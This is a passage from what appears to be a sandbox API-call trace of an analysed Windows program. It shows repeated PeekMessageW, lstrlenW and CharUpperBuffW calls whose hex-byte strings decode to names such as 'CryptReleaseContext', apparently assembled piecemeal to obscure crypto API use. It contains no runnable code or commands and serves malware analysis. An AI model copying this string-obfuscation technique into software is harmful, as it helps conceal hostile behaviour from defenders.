wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.153] lstrlenW (lpString="20") returned 2 [0086.153] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] lstrlenW (lpString="30") returned 2 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] lstrlenW (lpString="20") returned 2 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] lstrlenW (lpString="62") returned 2 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.154] lstrlenW (lpString="6F") returned 2 [0086.154] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.199] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.199] lstrlenW (lpString="6F") returned 2 [0086.199] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.199] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] lstrlenW (lpString="6C") returned 2 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] lstrlenW (lpString="43") returned 2 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] lstrlenW (lpString="72") returned 2 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] lstrlenW (lpString="79") returned 2 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] lstrlenW (lpString="70") returned 2 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] lstrlenW (lpString="74") returned 2 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] lstrlenW (lpString="52") returned 2 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] lstrlenW (lpString="65") returned 2 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.200] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="6C") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="65") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="61") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="73") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="65") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="43") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="6F") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="6E") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="74") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.201] lstrlenW (lpString="65") returned 2 [0086.201] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] lstrlenW (lpString="78") returned 2 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] lstrlenW (lpString="74") returned 2 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] lstrlenW (lpString="68") returned 2 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] lstrlenW (lpString="61") returned 2 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] lstrlenW (lpString="6E") returned 2 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] lstrlenW (lpString="64") returned 2 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] lstrlenW (lpString="6C") returned 2 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.202] lstrlenW (lpString="65") returned 2 [0086.202] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] lstrlenW (lpString="64") returned 2 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] lstrlenW (lpString="77") returned 2 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] lstrlenW (lpString="6F") returned 2 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] lstrlenW (lpString="72") returned 2 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] lstrlenW (lpString="64") returned 2 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] lstrlenW (lpString="20") returned 2 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.203] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.204] lstrlenW (lpString="30") returned 2 [0086.204] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.204] lstrlenW (lpString="20") returned 2 [0086.204] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.204] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0086.204] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.204] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0086.204] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.204] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.204] lstrlenW (lpString="20") returned 2 [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.204] lstrlenW (lpString="30") returned 2 [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.204] lstrlenW (lpString="20") returned 2 [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.204] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.205] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.205] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.205] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.205] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] lstrlenW (lpString="20") returned 2 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] lstrlenW (lpString="30") returned 2 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] lstrlenW (lpString="20") returned 2 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] lstrlenW (lpString="20") returned 2 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] lstrlenW (lpString="30") returned 2 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] lstrlenW (lpString="20") returned 2 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.243] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] lstrlenW (lpString="20") returned 2 [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 